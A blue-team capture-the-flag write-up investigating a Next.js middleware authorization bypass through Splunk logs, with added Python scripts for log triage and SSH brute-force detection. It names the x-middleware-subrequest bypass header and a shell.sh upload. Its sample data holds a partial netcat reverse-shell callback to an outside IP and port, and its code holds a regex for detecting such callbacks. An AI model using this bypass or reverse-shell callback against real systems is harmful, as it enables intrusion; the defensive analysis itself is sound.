John works in the security team at MiddleMayhem Incorporated. The security team detected unusual network traffic to their admin portal. However, no security breaches have been confirmed. John got SIEM logs about the incident from his team. He has to analyze the attack pattern to determine how the attackers bypassed authentication, achieved remote code execution, and moved laterally across the network.
Lab Information
| Field | Value |
|---|---|
| Difficulty | Easy |
| OS | Linux |
| Points | 25 |
| Created By | BTLO |
MiddleMayhem Website
The MiddleMayhem company's website is already bookmarked in the lab browser. Let's open it and take a look.

- Framework Information
If we examine the footer, we can see that the website runs on the JavaScript framework Next.js, version 15.0.0.

- Finding Sensitive (Juicy) URLs
Looking through the homepage, we can see several links in the footer bar of the MiddleMayhem website.

There are three links down there: Sitemaps, Admin, and Robots.
- The Sitemap returns a 404 error, so it is not what we are looking for.
- Admin leads to a login portal, an obvious point of interest for an attacker. This is one of the juicy links; it goes to /login.
- That leaves the Robots page. Among its listed paths we find two interesting ones: /admin and /admin/file-upload.

We now have a problem: the lab asks for two URLs, but we have three: /login, /admin, and /admin/file-upload.
There is a catch, though: /admin simply redirects to /login.
So the two URLs are /login and /admin/file-upload.
Splunk
Now we will check the logs in the Splunk SIEM. In the image below, we can see a large number of events.

- Identifying the malicious IP address
Let's see which IP addresses the connections come from. For that, we check the source IP field in the side filters.

A large number of connections were established from 172.217.164.174 and 218.92.0.204.
We will check both IP addresses one by one.
The 172.217.164.174 address looks clean.

Now it's time to check the 218.92.0.204 address.

Here, as we can see, the attacker attempted to upload a Bash shell script named "shell.sh". This address is hostile to the company: 218.92.0.204 is the attacker's IP address.
- Counting unique Uniform Resource Identifiers (URIs)
host=webapp ip_src=218.92.0.204 | stats dc(http_request_uri)
The total number of unique URIs requested by this address is 9930, a volume consistent with automated enumeration rather than normal browsing.
- HTTP Header
First, some background reading is needed to find clues. One of the articles mentions middleware, as shown in the image below.

Now we search in Splunk.
Searching for the term middleware returns 7 results.
Reviewing them, the first result contains a request header named x-middleware-subrequest.
- Attacker access after exploiting the CVE
For this, we focus on the search results containing the "middleware" header.
Applying the http_request_uri filter shows two URIs: /admin and /api/upload.

/api/upload is the URI we are looking for: it is the endpoint the attacker reached after bypassing the middleware check.
- Finding the reverse shell
host=webapp shell
The first search result contains the shell details, including the nc (netcat) callback IP address and port number.

IP address: 113.89.232.157, port number: 31337.
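As an added example (written for this writeup, not BTLO's lab material or its Splunk index), the Python below reproduces the triage steps from the IP check through the reverse-shell search over constructed log records: request counts per source IP, the distinct-URI count that `stats dc(http_request_uri)` returns, requests that reach protected paths while carrying the x-middleware-subrequest header, uploads with script extensions, and the nc callback address extracted from uploaded content. The record field names, the sample records and the header value are assumptions; only the IP addresses, port, paths and filename come from the writeup.

```python
"""Added example: access-log triage for the MiddleMayhem investigation.

Illustrative code written for this writeup, not BTLO's lab material.
Field names (host, ip_src, method, uri, headers, filename, body) and the sample
records are assumptions; the IPs, port, paths and filename are the writeup's.
"""
import re
from collections import Counter

# Constructed sample records standing in for Splunk events (NOT real lab data).
SAMPLE_LOGS = [
    {"host": "webapp", "ip_src": "172.217.164.174", "method": "GET", "uri": "/",
     "headers": {}, "body": ""},
    {"host": "webapp", "ip_src": "172.217.164.174", "method": "GET", "uri": "/robots.txt",
     "headers": {}, "body": ""},
    {"host": "webapp", "ip_src": "218.92.0.204", "method": "GET", "uri": "/admin",
     "headers": {}, "body": ""},            # unauthenticated: redirected to /login
    {"host": "webapp", "ip_src": "218.92.0.204", "method": "GET", "uri": "/login",
     "headers": {}, "body": ""},
    {"host": "webapp", "ip_src": "218.92.0.204", "method": "GET", "uri": "/admin",
     "headers": {"X-Middleware-Subrequest": "<value redacted>"}, "body": ""},
    {"host": "webapp", "ip_src": "218.92.0.204", "method": "POST", "uri": "/api/upload",
     "headers": {"X-Middleware-Subrequest": "<value redacted>"},
     "filename": "shell.sh",
     "body": "#!/bin/bash\nnc 113.89.232.157 31337 (remainder redacted)\n"},
]

PROTECTED_PREFIXES = ("/admin", "/api/upload")   # paths the middleware should gate
BYPASS_HEADER = "x-middleware-subrequest"        # header named in the Splunk results
SCRIPT_EXTENSIONS = (".sh", ".php", ".py", ".pl")
NC_CALLBACK = re.compile(r"\bnc\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def requests_per_source(logs):
    """Equivalent of the 'source IP' side filter: request count per ip_src."""
    return Counter(rec["ip_src"] for rec in logs)


def distinct_uris(logs, ip_src, host="webapp"):
    """Equivalent of: host=webapp ip_src=<ip> | stats dc(http_request_uri)."""
    return len({rec["uri"] for rec in logs
                if rec["host"] == host and rec["ip_src"] == ip_src})


def middleware_bypass_hits(logs):
    """Requests to protected paths that arrived with the bypass header set.

    A normal browser never sends this header, so an external request carrying
    it to a gated path is the detection signal for this attack path.
    """
    hits = []
    for rec in logs:
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        if BYPASS_HEADER in headers and rec["uri"].startswith(PROTECTED_PREFIXES):
            hits.append((rec["ip_src"], rec["method"], rec["uri"]))
    return hits


def suspicious_uploads(logs):
    """Uploads whose filename has a script extension (e.g. shell.sh)."""
    return [(rec["ip_src"], rec["filename"]) for rec in logs
            if rec.get("filename", "").lower().endswith(SCRIPT_EXTENSIONS)]


def netcat_callbacks(logs):
    """Extract 'nc <ip> <port>' callback targets from uploaded content."""
    found = []
    for rec in logs:
        for ip, port in NC_CALLBACK.findall(rec.get("body", "")):
            found.append((rec["ip_src"], ip, int(port)))
    return found


if __name__ == "__main__":
    print("requests per source:", dict(requests_per_source(SAMPLE_LOGS)))
    print("distinct URIs from 218.92.0.204:", distinct_uris(SAMPLE_LOGS, "218.92.0.204"))
    print("bypass hits:", middleware_bypass_hits(SAMPLE_LOGS))
    print("script uploads:", suspicious_uploads(SAMPLE_LOGS))
    print("nc callbacks:", netcat_callbacks(SAMPLE_LOGS))
```

The header match is case-insensitive because HTTP header names are, and the protected-path check uses prefixes so that /admin/file-upload is covered along with /admin. On the real index the distinct-URI count is the 9930 from the writeup; on the six constructed records it is 3.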
- Lateral movement
As we know, the MiddleMayhem website has a login portal, which means employees may hold login credentials.
We searched the results for a password and found the database server host (dbserver) being accessed via SSH login.

For lateral movement, an attacker can use techniques such as SSH, brute force, RDP, pass-the-ticket (PtT), pass-the-hash (PtH), and so on.
The attacker has neither a hash nor valid login credentials, so PtT, PtH and RDP are ruled out. That leaves SSH and brute force.
It is most likely an SSH brute-force attack, since the attacker would not have credentials for a normal SSH login.
- Identify the user account
While looking at the lateral movement events, we can see the user account name in the same result, shown below.

The user account is dbserv.
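As an added example (written for this writeup, not BTLO's lab material), the Python below implements the detection a SOC analyst would want for the lateral-movement step above: it parses sshd auth-log lines, groups them by host, source address and user, and reports password-guessing bursts, noting whether an accepted login follows the failures. The log lines are constructed; the host name dbserver and the account dbserv come from the writeup, while the source address 10.10.1.15 (standing in for the compromised web server), the second account, the timestamps and the threshold values are assumptions.

```python
"""Added example: SSH brute-force detection on the database server.

Illustrative code for this writeup, not BTLO's lab material. The auth-log
lines are constructed; dbserver and dbserv come from the writeup, while
10.10.1.15 (a stand-in for the compromised web server) and the timestamps
are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

AUTH_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)"
)

# Constructed sample log lines (NOT real lab data): six failures in eight
# seconds followed by a success, plus unrelated activity from another account.
SAMPLE_AUTH_LOG = [
    f"Mar 12 10:01:0{i} dbserver sshd[21{i}]: Failed password for dbserv "
    f"from 10.10.1.15 port 5012{i} ssh2"
    for i in range(1, 7)
] + [
    "Mar 12 10:01:09 dbserver sshd[2130]: Accepted password for dbserv from 10.10.1.15 port 50140 ssh2",
    "Mar 12 10:05:00 dbserver sshd[2200]: Accepted publickey for backup from 10.10.1.20 port 41000 ssh2",
    "Mar 12 10:06:00 dbserver sshd[2201]: Failed password for backup from 10.10.1.20 port 41001 ssh2",
]


def parse_auth_line(line):
    """Return a dict of fields for an sshd login line, or None if it is not one."""
    m = AUTH_LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # syslog timestamps carry no year; that is fine for ordering within one capture
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
    return ev


def bruteforce_candidates(lines, threshold=5, window_seconds=60):
    """Group auth events by (host, src, user) and report password-guessing bursts.

    A candidate is reported when at least `threshold` failed logins fall inside
    `window_seconds`; `success_after` is True when an Accepted login for the same
    (host, src, user) follows the last failure, i.e. the guessing likely succeeded.
    """
    by_key = defaultdict(list)
    for ev in filter(None, map(parse_auth_line, lines)):
        by_key[(ev["host"], ev["src"], ev["user"])].append(ev)

    report = []
    for (host, src, user), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "Failed"]
        if len(fails) < threshold:
            continue
        # sliding window: any run of `threshold` failures within the time window
        burst = any(
            (fails[i + threshold - 1]["ts"] - fails[i]["ts"]).total_seconds() <= window_seconds
            for i in range(len(fails) - threshold + 1)
        )
        if not burst:
            continue
        last_fail = fails[-1]["ts"]
        success_after = any(e["result"] == "Accepted" and e["ts"] >= last_fail for e in evs)
        report.append({"host": host, "src": src, "user": user,
                       "failures": len(fails), "success_after": success_after})
    return report


if __name__ == "__main__":
    for finding in bruteforce_candidates(SAMPLE_AUTH_LOG):
        print(finding)
```

A finding with `success_after` set is the one to escalate: it is the point at which the attacker's guessing turned into an authenticated session on dbserver. The single failure from the second account stays below the threshold and is not reported.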
Looking for the CVE
Now that we know the framework is Next.js, we turn to one of the most effective OSINT tools: Google.

The search turns up CVE-2025-29927, an authorization bypass in Next.js middleware triggered by the x-middleware-subrequest request header we saw in the logs.
Conclusion
MiddleMayhem is more than a simple lab. It’s a tutorial on modern web exploitation, log analysis, and real-time detection. It’s crucial to understand how even a minor header can lead to a breach in today’s rapidly evolving threat landscape.
MiddleMayhem lab will teach you to think like a defender — quick, analytical, and constantly adapting — regardless of your level of experience as a blue teamer or as a novice SOC analyst.
